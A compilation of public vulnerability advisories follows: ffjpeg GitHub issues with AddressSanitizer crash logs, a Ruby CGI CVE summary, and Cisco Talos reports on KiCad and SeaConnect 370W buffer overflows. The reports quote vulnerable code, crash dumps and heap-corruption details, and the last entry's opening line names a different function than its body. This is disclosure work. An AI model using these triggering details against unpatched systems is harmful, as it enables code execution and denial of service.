Two Heap based buffer overflow vulnerabilities exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23852. Issues that are in the jfif_decode function at ffjpeg/src/jfif.c (line 552) could cause a Denial of Service by using a crafted jpeg file.

**Describe**  
Two Heap-buffer-overflows were discovered in ffjpeg. The issues are being triggered in function jfif\_decode at jfif.c:552:31 and 552:38.

Found by **Cem Onat Karagun of Diesec**

**System info**  
OS version : Ubuntu 21.04  
ffjpeg Version : master 0fa4cf8a86

**Reproduce**

Compile ffjpeg with address sanitizer.

    CCFLAGS = -Wall -g -fsanitize=address 
    

**POC Files:**  
decode\_poc1.zip  
decode\_poc2.zip

Run POCs with the commands below.

    $ ffjpeg -d decode_poc1
    
    $ ffjpeg -d decode_poc2
    

**Asan output-1:**

    =================================================================
    ==3469985==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x00000030d50c bp 0x7ffc93e360f0 sp 0x7ffc93e360e8
    READ of size 4 at 0x602000000010 thread T0
        #0 0x30d50b in jfif_decode /src/src/jfif.c:552:31
        #1 0x3035f0 in main /src/src/ffjpeg.c:24:9
        #2 0x7f3772bef564 in __libc_start_main csu/../csu/libc-start.c:332:16
        #3 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd)
    
    0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011)
    allocated by thread T0 here:
        #0 0x2cc85d in malloc (/REDACTED/ffjpeg/src/ffjpeg+0x2cc85d)
        #1 0x309025 in jfif_decode /src/src/jfif.c:443:21
        #2 0x3035f0 in main /src/src/ffjpeg.c:24:9
        #3 0x7f3772bef564 in __libc_start_main csu/../csu/libc-start.c:332:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /src/src/jfif.c:552:31 in jfif_decode
    Shadow bytes around the buggy address:
      0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c047fff8000: fa fa[01]fa fa fa 01 fa fa fa 01 fa fa fa fa fa
      0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:  
    

**Asan output-2:**

    =================================================================
    ==3487109==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x00000030d52a bp 0x7ffe17b50930 sp 0x7ffe17b50928
    READ of size 4 at 0x602000000010 thread T0
        #0 0x30d529 in jfif_decode /src/src/jfif.c:552:38
        #1 0x3035f0 in main /src/src/ffjpeg.c:24:9
        #2 0x7fec13038564 in __libc_start_main csu/../csu/libc-start.c:332:16
        #3 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd)
    
    0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011)
    allocated by thread T0 here:
        #0 0x2cc85d in malloc (/REDACTED/ffjpeg/src/ffjpeg+0x2cc85d)
        #1 0x309068 in jfif_decode /src/src/jfif.c:444:21
        #2 0x3035f0 in main /src/src/ffjpeg.c:24:9
        #3 0x7fec13038564 in __libc_start_main csu/../csu/libc-start.c:332:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /src/src/jfif.c:552:38 in jfif_decode
    Shadow bytes around the buggy address:
      0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c047fff8000: fa fa[01]fa fa fa 01 fa fa fa fa fa fa fa fa fa
      0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3487109==ABORTING

CVE-2021-44956: Heap-buffer-overflows in jfif_decode() at jfif.c:552:31 and 552:38 · Issue #43 · rockcarry/ffjpeg

Global buffer overflow vulnerability exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23705. Issue is in the jfif_encode function at ffjpeg/src/jfif.c (line 708) could cause a Denial of Service by using a crafted jpeg file.

**Describe**  
A global-buffer-overflow was discovered in ffjpeg. The issue is being triggered in function jfif\_encode at jfif.c:708.

Found by **Cem Onat Karagun of Diesec**

**System info**  
OS version : Ubuntu 21.04  
ffjpeg Version : master(0fa4cf8a86)

**Reproduce**

Compile ffjpeg with address sanitizer.

    CCFLAGS = -Wall -g -fsanitize=address 
    

PoC file:  
encode\_poc1.zip

Run with the following command.

**Asan output:**

    =================================================================
    ==3406031==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000231972 at pc 0x0000002cbc07 bp 0x7ffcef6304f0 sp 0x7ffcef62fcb8
    READ of size 272 at 0x000000231972 thread T0
        #0 0x2cbc06 in __asan_memcpy (/REDACTED/ffjpeg/src/ffjpeg+0x2cbc06)
        #1 0x30f33b in jfif_encode /src/src/jfif.c:708:5
        #2 0x3029f2 in main /src/src/ffjpeg.c:30:16
        #3 0x7fdfb0d3b564 in __libc_start_main csu/../csu/libc-start.c:332:16
        #4 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd)
    
    0x000000231972 is located 46 bytes to the left of global variable 'STD_HUFTAB_LUMIN_DC' defined in 'huffman.c:398:12' (0x2319a0) of size 28
    0x000000231972 is located 0 bytes to the right of global variable 'STD_HUFTAB_LUMIN_AC' defined in 'huffman.c:382:12' (0x2318c0) of size 178
    SUMMARY: AddressSanitizer: global-buffer-overflow (/REDACTED/ffjpeg/src/ffjpeg+0x2cbc06) in __asan_memcpy
    Shadow bytes around the buggy address:
      0x00008003e2d0: f9 f9 f9 f9 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
      0x00008003e2e0: 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00 00 01 f9 f9
      0x00008003e2f0: f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 00 00 00 00
      0x00008003e300: 00 00 00 00 00 00 00 00 00 00 00 00 04 f9 f9 f9
      0x00008003e310: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x00008003e320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[02]f9
      0x00008003e330: f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9 00 00 00 00
      0x00008003e340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x00008003e350: 00 00 02 f9 f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9
      0x00008003e360: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
      0x00008003e370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3406031==ABORTING
    

    memcpy(jfif->phcac[0]->huftab, STD_HUFTAB_LUMIN_AC, MAX_HUFFMAN_CODE_LEN + 256);

CVE-2021-44957: global-buffer-overflow in function jfif_encode at jfif.c:708 · Issue #44 · rockcarry/ffjpeg

CGI.escape_html in Ruby before 2.7.5 and 3.x before 3.0.3 has an integer overflow and resultant buffer overflow via a long string on platforms (such as Windows) where size_t and long have different numbers of bytes. This also affects the CGI gem before 0.3.1 for Ruby.

CVE-2021-41816

A stack-based buffer overflow vulnerability exists in the Gerber Viewer gerber and excellon DCodeNumber parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

Multiple stack-based buffer overflow vulnerabilities exist in the Gerber Viewer gerber and excellon GCode/Dcode parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

KiCad EDA 6.0.1  
KiCad EDA master commit de006fc010

**Product URLs**

KiCad EDA - https://www.kicad.org/

**CVSSv3 Score**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

KiCad is a cross-platform open-source software for electronics design automation. It allows users to design and simulate electronic hardware and offers several tools like a schematic and symbol editor, PCB and footprint editor, Gerber viewer and others.

KiCad's Gerber Viewer is found in a separate binary called gerbview and allows the viewing of Gerber files, Excellon files, Gerber job files, optionally contained in zip archives.

When opening a Gerber file, the method GERBER_FILE_IMAGE::LoadGerberFile in readgerb.cpp is called:

    // size of a single line of text from a gerber file.
    // warning: some files can have *very long* lines, so the buffer must be large.
    #define GERBER_BUFZ 1000000
    // A large buffer to store one line
    static char lineBuffer[GERBER_BUFZ+1];  // [1]
    
    bool GERBER_FILE_IMAGE::LoadGerberFile( const wxString&amp; aFullFileName )
    {
        int      G_command = 0;        // command number for G commands like G04
        int      D_commande = 0;       // command number for D commands like D02
        char*    text;
    
        ClearMessageList( );
        ResetDefaultValues();
    
        // Read the gerber file */
        m_Current_File = wxFopen( aFullFileName, wxT( &#34;rt&#34; ) );
    
        if( m_Current_File == nullptr )
            return false;
    
        m_FileName = aFullFileName;
    
        LOCALE_IO toggleIo;
    
        wxString msg;
    
        while( true )
        {
            if( fgets( lineBuffer, GERBER_BUFZ, m_Current_File ) == nullptr )  // [2]
                break;
    
            m_LineNum++;
            text = StrPurge( lineBuffer );
    
            while( text &amp;&amp; *text )
            {
                switch( *text )
                {
                case &#39; &#39;:
                case &#39;\r&#39;:
                case &#39;\n&#39;:
                    text++;
                    break;
    
                case &#39;*&#39;:       // End command
                    m_CommandState = END_BLOCK;
                    text++;
                    break;
    
                case &#39;M&#39;:       // End file
                    m_CommandState = CMD_IDLE;
                    while( *text )
                        text++;
                    break;
    
                case &#39;G&#39;:    /* Line type Gxx : command */
                    G_command = GCodeNumber( text );                 // [3]
                    Execute_G_Command( text, G_command );
                    break;
    
                case &#39;D&#39;:       /* Line type Dxx : Tool selection (xx &gt; 0) or
                                 * command if xx = 0..9 */
                    D_commande = DCodeNumber( text );                // [4]
                    Execute_DCODE_Command( text, D_commande );
                    break;
    

This method takes a gerber file path, opens it and parses it line-by-line \[2\], restricting the maximum line length to 1,000,000 bytes \[1\]. When a line starting with "D" or "G" is encountered, the methods DCodeNumber \[4\] or GCodeNumber \[3\] are called. In both cases, the current line is passed as parameter. Both methods lead to the same issue. Let's detail them individually.  
Also note that the DCodeNumber method can be reached via an Excellon file in a similar way (via EXCELLON_IMAGE::LoadFile), as discussed below.

**CVE-2022-23946 - GCodeNumber**

    int GERBER_FILE_IMAGE::GCodeNumber( char*&amp; Text )
    {
        int   ii = 0;
        char* text;
        char  line[1024];          // [5]
    
        if( Text == nullptr )
            return 0;
    
        Text++;
        text = line;
    
        while( IsNumber( *Text ) ) // [6]
        {
            *(text++) = *(Text++);
        }
    
        *text = 0;                 // [7]
        ii    = atoi( line );
        return ii;
    }
    

At \[5\] a line buffer of size 1024 bytes is allocated on the stack. The while loop at \[6\] expects a number inside the line and stores the current character in the text buffer (that is, the line buffer) \[5\] and only stops when Text does not point to a number anymore.  
Because Text \[1\] is much larger than line and the loop does not check if it's operating within the line's buffer bounds, the loop could write out of bounds if a large enough line containing numbers is supplied. This is a straightforward stack-based buffer overflow that could lead to code execution. Moreover, *text is assigned to later in the same method \[7\], so corruption could occur slightly later too.

Allowed characters for IsNumber are the following:

    #define IsNumber( x ) ( ( ( (x) &gt;= &#39;0&#39; ) &amp;&amp; ( (x) &lt;=&#39;9&#39; ) )   \
                           || ( (x) == &#39;-&#39; ) || ( (x) == &#39;+&#39; )  || ( (x) == &#39;.&#39; ) )
    

**CVE-2022-23947 - DCodeNumber**

    int GERBER_FILE_IMAGE::DCodeNumber( char*&amp; Text )
    {
        int   ii = 0;
        char* text;
        char  line[1024];          // [5]
    
        if( Text == nullptr )
            return 0;
    
        Text++;
        text = line;
    
        while( IsNumber( *Text ) ) // [6]
            *(text++) = *(Text++);
    
        *text = 0;                 // [7]
        ii    = atoi( line );
        return ii;
    }
    

At \[5\] a line buffer of size 1024 bytes is allocated on the stack. The while loop at \[6\] expects a number inside the line and stores the current character in the text buffer (that is, the line buffer) \[5\] and only stops when Text does not point to a number anymore.  
Because Text \[1\] is much larger than line and the loop does not check if it's operating within the line's buffer bounds, the loop could write out of bounds if a large enough line containing numbers is supplied. This is a straightforward stack-based buffer overflow that could lead to code execution. Moreover, *text is assigned to later in the same method \[7\], so corruption could occur slightly later too.

Allowed characters for IsNumber are the following:

    #define IsNumber( x ) ( ( ( (x) &gt;= &#39;0&#39; ) &amp;&amp; ( (x) &lt;=&#39;9&#39; ) )   \
                           || ( (x) == &#39;-&#39; ) || ( (x) == &#39;+&#39; )  || ( (x) == &#39;.&#39; ) )
    

Note that this method is also used while parsing an Excellon file, when parsing a TCode. In the EXCELLON_IMAGE class we find:

    int TCodeNumber( char*&amp; aText )
    {
        return DCodeNumber( aText );
    }
    

So in this case, the DCodeNumber issue can be triggered via EXCELLON_IMAGE::Select_Tool, which eventually calls DCodeNumber.

**Crash Information**

    =================================================================
    ==1833==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff8700 at pc 0x7fffed7df5de bp 0x7fffffff82b0 sp 0x7fffffff82a0
    WRITE of size 1 at 0x7fffffff8700 thread T0
        #0 0x7fffed7df5dd in GERBER_FILE_IMAGE::DCodeNumber(char*&amp;) src/kicad_1/gerbview/rs274d.cpp:435
        #1 0x7fffed7da342 in GERBER_FILE_IMAGE::LoadGerberFile(wxString const&amp;) src/kicad_1/gerbview/readgerb.cpp:177
        #2 0x7fffed7d8e09 in GERBVIEW_FRAME::Read_GERBER_File(wxString const&amp;) src/kicad_1/gerbview/readgerb.cpp:58
        #3 0x7fffed783cd4 in GERBVIEW_FRAME::LoadListOfGerberAndDrillFiles(wxString const&amp;, wxArrayString const&amp;, std::vector&lt;int, std::allocator&lt;int&gt; &gt; const*) src/kicad_1/gerbview/files.cpp:293
        #4 0x7fffed780004 in GERBVIEW_FRAME::LoadGerberFiles(wxString const&amp;) src/kicad_1/gerbview/files.cpp:199
        #5 0x7fffed7acfb5 in GERBVIEW_FRAME::OpenProjectFiles(std::vector&lt;wxString, std::allocator&lt;wxString&gt; &gt; const&amp;, int) src/kicad_1/gerbview/gerbview_frame.cpp:273
        #6 0x55555561eae6 in PGM_SINGLE_TOP::OnPgmInit() src/kicad_1/common/single_top.cpp:428
        #7 0x555555625b0c in APP_SINGLE_TOP::OnInit() (gerbview+0xd1b0c)
        #8 0x5555556245c1 in wxAppConsoleBase::CallOnInit() (gerbview+0xd05c1)
        #9 0x7ffff6a38799 in wxEntry(int&amp;, wchar_t**) (/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0+0x113799)
        #10 0x55555561d75a in main src/kicad_1/common/single_top.cpp:269
        #11 0x7ffff509e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #12 0x55555561d2ed in _start (gerbview+0xc92ed)
    
    Address 0x7fffffff8700 is located in stack of thread T0 at offset 1056 in frame
        #0 0x7fffed7df229 in GERBER_FILE_IMAGE::DCodeNumber(char*&amp;) src/kicad_1/gerbview/rs274d.cpp:423
    
      This frame has 1 object(s):
        [32, 1056) &#39;line&#39; (line 426) &lt;== Memory access at offset 1056 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow src/kicad_1/gerbview/rs274d.cpp:435 in GERBER_FILE_IMAGE::DCodeNumber(char*&amp;)
    Shadow bytes around the buggy address:
      0x10007fff7090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =&gt;0x10007fff70e0:[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x10007fff70f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7100: f1 f1 f1 f1 00 00 00 f2 00 00 00 f2 00 00 00 f2
      0x10007fff7110: f2 f2 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
      0x10007fff7120: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
      0x10007fff7130: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1833==ABORTING
    

**Timeline**

2022-02-14 - Vendor Disclosure

2022-02-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-23947: TALOS-2022-1460 || Cisco Talos Intelligence Group

A heap-based buffer overflow vulnerability exists in the OTA Update u-download functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A series of specially-crafted MQTT payloads can lead to remote code execution. An attacker must perform a man-in-the-middle attack in order to trigger this vulnerability.

**Summary**

A heap-based buffer overflow vulnerability exists in the OTA Update u-download functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A series of specially-crafted MQTT payloads can lead to remote code execution. An attacker must perform a man-in-the-middle attack in order to trigger this vulnerability.

**Tested Versions**

Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**Details**

The SeaConnect 370W is a Wi-Fi connected IIoT device offering programmable cloud access and control of digital and analog I/O and a 1-wire bus.

This device offers remote control via several means including MQTT, Modbus TCP and a manufacturer-specific protocol named “SeaMAX API.”

The device is built on top of the TI CC3200 MCU with built-in Wi-Fi capabilities.

The SeaConnect 370W implements an over-the-air firmware update mechanism which is controlled remotely from the “Sealevel SeaCloud” via an MQTTS connection. When a device comes online, it connects to the SeaCloud MQTTS broker and transmits its current firmware version. When an outdated firmware is detected, a message is published to that device’s command channel detailing the FTP(S) url containing the new image. The parsing of this message is vulnerable to a heap overflow, which can be leveraged to create a write-what-where primitive, allowing a remote attacker to overwrite arbitrary instructions and cause their execution.

The message published to the command channel to initiate a firmware update is a JSON blob which the system expects will be structured as follows:

    {
        "name": "u-download",
        "payload": "{
                                     \"uri\": \"<uri to firmware image>\",
                                     \"dest\": \"<local filename to write>\",
                                     \"crc\": \"<crc>\"
                                 }"
    }
    

Note the payload field of the JSON blob is expected to be a string containing a quote-escaped JSON blob. When an MQTT message is received with a name field containing u-download, the payload field of that message will be passed as an argument to a function named ParseToDownloadMessage, located at raw offset 0xFFFC, which is mapped to RAM for execution at 0x2000FFFC. This function is responsible for parsing the payload and populating a structure that will be used by a separate task to begin downloading and applying the described firmware update. The relevant portion of the decompilation for this function is included below. This portion of the function is responsible for unescaping the quotes contained in the payload string so that it may be parsed as a JSON object.

    int __fastcall ParseToDownloadMessage(OTAUpdateStruct *a1, char *payload)
    {
      int len; // r0
      char *reformattedPayload; // r0 MAPDST
      const char *v6; // r8
      int v8; // r2
      int result; // r0
      int v10; // r5
      char *v11; // r7
      jsonParser jParser; // [sp+0h] [bp-30h] BYREF
    
      len = MIN(strlen(payload), 256);
      reformattedPayload = malloc(len);             [1] Allocate either the length of the payload, or 256, whichever is smaller
      if ( !reformattedPayload )
      {
        Report("ERROR: SeaConnectOtaUpdate %s Allocation of reformattedPayload (%d bytes) failed\r\n", "ParseToDownloadMessage", len);
        return 0;
      }
      unescape(reformattedPayload, payload);        [2] Unescape the quotes into the recently allocated buffer, ignoring the actual length of the payload
      ...
    }
    

As noted above, at [1] a buffer is allocated that is the minimum of 256 or the length of the payload. Then, this newly allocated buffer and the original payload are passed as arguments to unescape. The unescape function is very straightforward - it acts like a call to strcpy that discards \ characters. An annotated decompilation is included below for reference.

    void unescape(char *dest, char *src)
    {
      int src_idx;
      int dest_idx;
      char curr_char;
      
      for ( src_idx = 0; src_idx < strlen(src); src_idx++ )
      {
        curr_char = src[src_idx];         
        if ( curr_char == '\\' )
        {
          continue;
        } else {
          dest[dst_idx] = curr_char;
          dst_idx++;
        }
      }
      dest[dst_idx] = '\0';
    }
    

For the purposes of this vulnerability, viewing unescape as an alias for strcpy makes it clear that the call to unescape at [2] can result in a buffer overflow. Supplying a payload larger than 256 bytes will cause an overflow on the heap. A particularly-formatted overflow can corrupt heap metadata in such a way as to allow an attacker to control the pointer that will be returned by subsequent calls to malloc. In practice, controlling the next allocated pointer is enough to gain remote code execution.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x00000000
    R2       = 0x00000000
    R3       = 0x200372dd
    R12      = 0x20032bd4
    LR [R14] = 0x2000cf51  subroutine call return address
    PC [R15] = 0x2000d300  Program Counter
    PSR      = 0x60000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00020000
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

Traversing the FreeRTOS heap freelist after corruption, we observe that one of the BlockLink_ts has been modified to point to our target address.

    xStart => {
      pxNextFreeBlock = 0x2003a418, 
      xBlockSize = 48
    }
    0x2003a418 => {
      pxNextFreeBlock = 0x41414141, 
      xBlockSize = 23392
    }
    0x41414141 => {
      pxNextFreeBlock = 0x0, 
      xBlockSize = 0
    }
    

**Timeline**

2021-10-26 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21962: TALOS-2021-1390 || Cisco Talos Intelligence Group

An out-of-bounds write vulnerability exists in the URL_decode functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.

**Summary**

An out-of-bounds write vulnerability exists in the readPacket functionality of Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can send a malicious MQTT message to trigger this vulnerability.

**Tested Versions**

Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0  
Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

Embedded Paho MQTTClient-C library - https://www.eclipse.org/paho/index.php?page=clients/c/embedded/index.php SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**Details**

The Embedded Paho MQTTClient-C library is a MQTT client library for the language C. This library is primarily designed for embedded devices.

This vulnerability was discovered while looking at the SeaConnect 370W. The mentioned device uses the Paho MQTTClient-C library version 1.0.0. In this version is present a buffer overflow vulnerability in the function readPacket. This was corrected in July 2017. This correction was treated as a security improvement, and no CVE was assigned to it. The consequence was that the SeaConnect 370W did not update its firmware with the correction. This, in turn, leads to a remote command execution vulnerability in the SeaConnect 370W due to the buffer overflow caused in the Paho MQTTClient-C library version 1.0.0.

The readPacket function in the SeaConnect 370W is:

      uint readPacket(MQTTClient *c,undefined4 param_2)
    
      {
        uint rc;
        undefined4 timer_;
        int iVar1;
        dword dVar2;
        undefined *ipstack;
        dword rem_len;
    
        read_volatile(PTR_DWORD_20012de8._0_1_);
        ipstack = c->ipstack;
        rem_len = 0;
        timer_ = TimerLeftMS(param_2);
        rc = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf,1,timer_);                                    [1]
                          /* calling mqttread ^ */
        if (rc == 1) {
          timer_ = TimerLeftMS(param_2);
          decodePacket(c,&rem_len,timer_);                                                                  [2]
          iVar1 = MQTTPacket_encode(c->readbuf + 1,rem_len);
          if (0 < (int)rem_len) {
            ipstack = c->ipstack;
            timer_ = TimerLeftMS(param_2);
            dVar2 = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf + iVar1 + 1,rem_len,timer_);           [3]
                          /* calling mqttread ^ */
            if (rem_len != dVar2) {
              return 1;
            }
          }
          rc = ((uint)(byte)*c->readbuf << 0x18) >> 0x1c;
        }
        return rc;
      }
    

This is a Paho MQTTClient-C’s function that handles a new MQTT mesage. It reads at [1] the heder byte and at [2] reads, from the packet, the remaining size of the packet. This size is then used at [3] to read into a heap buffer the remaining message.

The buffer used at [3], for the SeaConnect 370W, is allocated in SeaConnectMqtt_Init:

      void SeaConnectMqtt_Init(void)
    
      {
        [...]
        
        receiveBuffer_ptr = (int *)read_volatile_4(receiveBuffer);
        puVar1 = read_volatile_4(PTR_aSeaconnectmqtt_3_20010be8);
        if (*receiveBuffer_ptr == 0) {
          malloc_res = malloc(0x201);                                                                       [4]
          *receiveBuffer_ptr = malloc_res;
        [...]
        
        }
    

At [4] 0x201 bytes are allocated to manage a MQTT mesage, but the function readPacket does not control the size of the variable rem_len before reading the message content at [3]. This can lead to a buffer overflow.

The corrected Paho MQTTClient-C’s readPacket:

    static int readPacket(MQTTClient* c, Timer* timer)
    {
        MQTTHeader header = {0};
        int len = 0;
        int rem_len = 0;
    
        /* 1. read the header byte.  This has the packet type in it */
        int rc = c->ipstack->mqttread(c->ipstack, c->readbuf, 1, TimerLeftMS(timer));
        if (rc != 1)
            goto exit;
    
        len = 1;
        /* 2. read the remaining length.  This is variable in itself */
        decodePacket(c, &rem_len, TimerLeftMS(timer));
        len += MQTTPacket_encode(c->readbuf + 1, rem_len); /* put the original remaining length back into the buffer */
    
        if (rem_len > (c->readbuf_size - len))                                                              [5]
        {
            rc = BUFFER_OVERFLOW;
            goto exit;
        }
    
        /* 3. read the rest of the buffer using a callback to supply the rest of the data */
        if (rem_len > 0 && (rc = c->ipstack->mqttread(c->ipstack, c->readbuf + len, rem_len, TimerLeftMS(timer)) != rem_len)) {
            rc = 0;
            goto exit;
        }
    
        header.byte = c->readbuf[0];
        rc = header.bits.type;
    exit:
        return rc;
    }
    

A size check was introduced at [5] to avoid the buffer overflow.

The nature of the buffer overflow depends upon the library user. Indeed, the buffer used in readPacket is provided by the library utilizer and not allocated by the Paho MQTTClient-C library.

**Timeline**

2021-10-27 - Initial vendor contact  
2021-11-03 - Vendor disclosure  
